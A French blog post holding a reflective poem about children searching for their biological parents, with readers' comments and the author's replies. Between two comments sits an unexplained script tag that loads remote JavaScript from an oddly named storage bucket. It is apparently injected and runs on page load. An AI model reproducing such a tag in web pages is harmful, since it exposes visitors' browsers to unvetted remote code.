• Mon passé !

    A la recherche de son passé

     

    Enfants errant sur les trottoirs de Manille,
    Seul, refusant les orphelinats trop sombres
    Seul s’opposant une famille d’accueil,
    Il ne connait pas ceux qui lui ont donné la vie ;
    Il aimerait les rencontrer,
    Est-ce une bonne chose pour lui et pour eux ?
    Serait-il plus heureux après ?

    Enfants séparés de leurs parents pour respecter la loi,
    Comme à Mayotte face aux immigrés des Comores.
    Enfants dans des camps de prisonniers,
    Pour être accueillis dans leur pays d’origine, la France,
    Seront rapatriés pour être placés en famille d’accueil,
    Tandis que leur mère rejoindra une prison,
    A cause de leur père mort au combat.
    Seront-ils plus heureux en France,
    Qu’avec leur mère dans des camps tenus par les Serbes.

    Enfants de parents séparés ou divorcés,
    Eloignement volontaire de leur géniteur,
    Plaçant ente eux de nombreux kilomètres,
    Enfants de tous âges meurtris par cette situation.
    Enfants issus de dons de sperme,
    Ou de parents du même sexe,
    Ont-ils le droit de savoir qui les a engendrés.
    Drame familial que l’évolution des mœurs accentue,
    Et les laisse aux abois,
    Sans comprendre l’origine du drame qu’ils vivent.

    Rechercher à renouer le dialogue,
    Avec ceux qui les ont abandonnés,
    Sans en connaitre les raisons,
    Est-ce une bonne solution,
    Nécessaire à leur survie.
    Retrouver son père,
    Retrouver sa mère,
    Reprendre le dialogue rompu depuis des années,
    Là où il s’est brusquement arrêté,
    N’est pas sans risque
    Tant pour l’enfant que pour ses parents séparés.

    Le principal risque est la culbute dans l’autre camp,
    Abandonnant plus ou moins l’autre,
    Celui ou celle qui les avaient recueillis,
    Les aidants à être ce qu’ils sont aujourd’hui ?
    Avoir des réponses aux questions posées sur la séparation,
    Justifications émanant d’un seul coté,
    Sans tenir compte des motivations de l’autre.
    Parents ayant refait leur vie,
    Taisant les enfants passés.
    Drame familial pour celui qui a donné son sperme sous l’anonymat,
    Aujourd’hui remis en question.

    Qu’il s’agisse de Maïa dans le live de Sévy « à l’abri de la différence »
    D’Angèle dans un autre roman,
    Des enfants séparés de leur mère à Mayotte,
    De l’inconnu d’un camp Palestinien,
    La prudence est la première des vertus.
    Le drame vécu par l’enfant peut-être pire
    Lorsque la réalité s’ouvre devant leurs yeux.
    Ils n’ont pas d’autres solutions
    Que repartir au point de départ,
    Avec un poids lourd sur les bras.
    (18/11/2019)


  • Commentaires

    10
    Jeudi 21 Novembre à 20:30

    Tout dépend de la personnalité de l'adulte qui fut un enfant abandonné 

    Chercher ses racines peut-être  un + vital pour poursuivre sa route et compléter ce vide et ce manque d'une enfance cahotique  

    Bonne soirée 

    @ demain 

    9
    Jeudi 21 Novembre à 11:21

    L'enfance peut être la période la plus gaie et la plus enthousiasmante de la vie ou au contraire la plus triste et la plus éprouvante, hélas... Tous les enfants ne partent pas avec les mêmes chances dans la vie, et c'est quelque chose qui m'a toujours attristée, moi aussi...

    Très beau texte, Daniel. Merci.

      • Jeudi 21 Novembre à 15:48

        Merci Martine de ta réponse. Question sans réponse commune car chaque cas est particulier. La loi ne peut tout faire. Bonne fin de journée

    8
    Jeudi 21 Novembre à 06:45
    Séverine

    Vaste question à laquelle il n'est pas facile de répondre.

    7
    Mercredi 20 Novembre à 02:43
    colettedc

    De bien tristes situations, hélas ! Vouloir savoir d'où ils viennent, c'est bien légitime ! Que ferions-nous ou plutôt qu'aurions-nous fait à leur place !!!

      • Jeudi 21 Novembre à 15:46

        Question, qui a autant de réponse que  de cas. A ses parents adoptifs de l'accompagner dans cette démarche dont l'issue peut le bouleverser. Bonne fin de journée

    6
    Evy
    Mardi 19 Novembre à 18:12

    Rechercher ses parents biologiques et savoir d'où on viens bonne soirée à toi bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    5
    Mardi 19 Novembre à 17:37
    Tu as raison mais il me paraît légitime et même bénéfique qu'un enfant puisse rechercher ses parents biologiques et les trouver pour savoir d'où il vient. Bisous
      • Jeudi 21 Novembre à 15:43

        Cette recherche peut s'avérer dangereuse pour lui. Il faut rester très prudent. Bonne fin de journée

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :